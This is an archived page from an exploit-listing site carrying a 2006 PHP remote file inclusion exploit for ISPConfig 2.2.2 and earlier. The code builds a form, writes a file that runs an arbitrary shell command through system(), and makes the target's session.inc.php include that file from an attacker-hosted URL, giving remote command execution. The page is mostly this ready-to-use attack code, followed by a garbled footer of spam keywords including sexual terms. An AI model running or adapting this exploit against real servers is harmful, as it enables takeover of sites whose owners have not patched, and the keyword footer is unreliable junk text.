about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , ISPConfig <= 2.2.2 (session.inc.php) Remote File Inclusion Exploit



2006-05-07 ISPConfig <= 2.2.2 (session.inc.php) Remote File Inclusion Exploit
Rated as : High Risk

<?php
/*
ISPConfig Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN

example:
turl:
http://www.target.com/lib/session.inc.php?go_info[server][classes_root]=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\"
action=\"".$PHP_SELF."\">"
    ."turl:<br><input type=\"text\"
name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
    ."hurl:<br><input type=\"text\"
name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
    ."cmd:<br><input type=\"text\"
name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
    ."<input type=\"submit\" value=\"Submit\"
name=\"submit\">"
    ."</form><HR WIDTH=\"650\"
ALIGN=\"LEFT\">";

if (!isset($_POST['submit'])) 
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\");
system(\"".$cmd."\"); 
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
    echo "<p>Unable to get output.\n";
    exit;
}

echo $form;

while (!feof ($file)) {
    $line .= fgets ($file, 1024)."<br>";
    }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>
securitydot.net - 2006-05-07

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 12:31:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
522hj.cn lsass news for c www.xxltv. rudester.c news for c men having 18nisa2 free vedio news for c www.990.gx www.njfghj mocro_http mambo Remo www.5suv.c Web Wiz Jo Sexi vedi karchisex. crack data solo sex Pls openxx potoes indian sto dmoz.im jdsm.testg Babies zeroboard. Microsoft www.filmpo Web Wiz Gu Www.sexy.i privilege news for c Apache 2. Bootymart las WW.89com PHP 4.4.2 WW.89com t677t m.php?mosC www.js008. IP.Board 2 Www.sex400 sreya Login to C fuck schoo Crack Data Hinata sek Crack+Data